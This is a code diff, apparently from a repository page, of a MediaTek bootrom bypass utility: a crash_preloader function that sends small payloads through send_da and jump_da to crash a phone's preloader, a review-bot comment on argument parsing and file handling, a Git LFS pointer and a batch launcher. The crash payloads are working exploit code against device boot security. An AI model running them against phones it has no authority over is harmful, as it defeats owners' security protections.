+ return config, serial_link_authorization, download_agent_authorization, hw_code
209
+
210
+ def crash_preloader(device, config):
211
+ print("")
212
+ log("Found device in preloader mode, trying to crash...")
213
+ print("")
214
+ if config.crash_method == 0:
215
+ try:
216
+ payload = b'\x00\x01\x9F\xE5\x10\xFF\x2F\xE1' + b'\x00' * 0x110
217
+ device.send_da(0, len(payload), 0, payload)
218
+ device.jump_da(0)
219
+ except RuntimeError as e:
220
+ log(e)
221
+ print("")
222
+ elif config.crash_method == 1:
223
+ payload = b'\x00' * 0x100
224
+ device.send_da(0, len(payload), 0x100, payload)
225
+ device.jump_da(0)
226
+ elif config.crash_method == 2:
227
+ device.read32(0)
228
+
229
+ device.dev.close()
230
+
231
+ device = Device().find()
232
+
233
+ return device
234
+
235
+
236
+ if __name__ == "__main__":
237
+ main()
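Review bot: The override `if arguments.crash_method:` in get_device_info silently discards an explicit `-m 0`, because the option is declared with `type=int` and the integer 0 is falsy, so the config's own crash_method is kept and method 0 can never be selected from the command line; compare against the parser's default instead, `if arguments.crash_method is not None:`. Separately, the test-mode dump `open(bootrom__name, "wb").write(bruteforce(device, config, dump_ptr, True))` in main and the `config_file = open(arguments.config)` / `config_file.close()` pair in get_device_info leave the handle open if the call in between raises, unlike dump_brom and prepare_payload which already use `with`; `with open(bootrom__name, "wb") as bootrom: bootrom.write(...)` and `with open(arguments.config) as config_file: config = Config().from_file(config_file, hw_code)` make the three functions consistent. The `exit(0)` that follows the dump is the site module's interactive helper rather than part of the language; `sys.exit(0)` (with `import sys` added to the imports) is the portable form and also behaves under `python -S`.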
mtk-bypass-utility.zip ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:d9f0a86c19b91f38cd8e64522fc8b550b3a750120902838a247a50350bd60d8b
3
+ size 6426596
mtk_bypass.bat ADDED
@@ -0,0 +1 @@
 
 
1
+ start cmd /k "python main.py"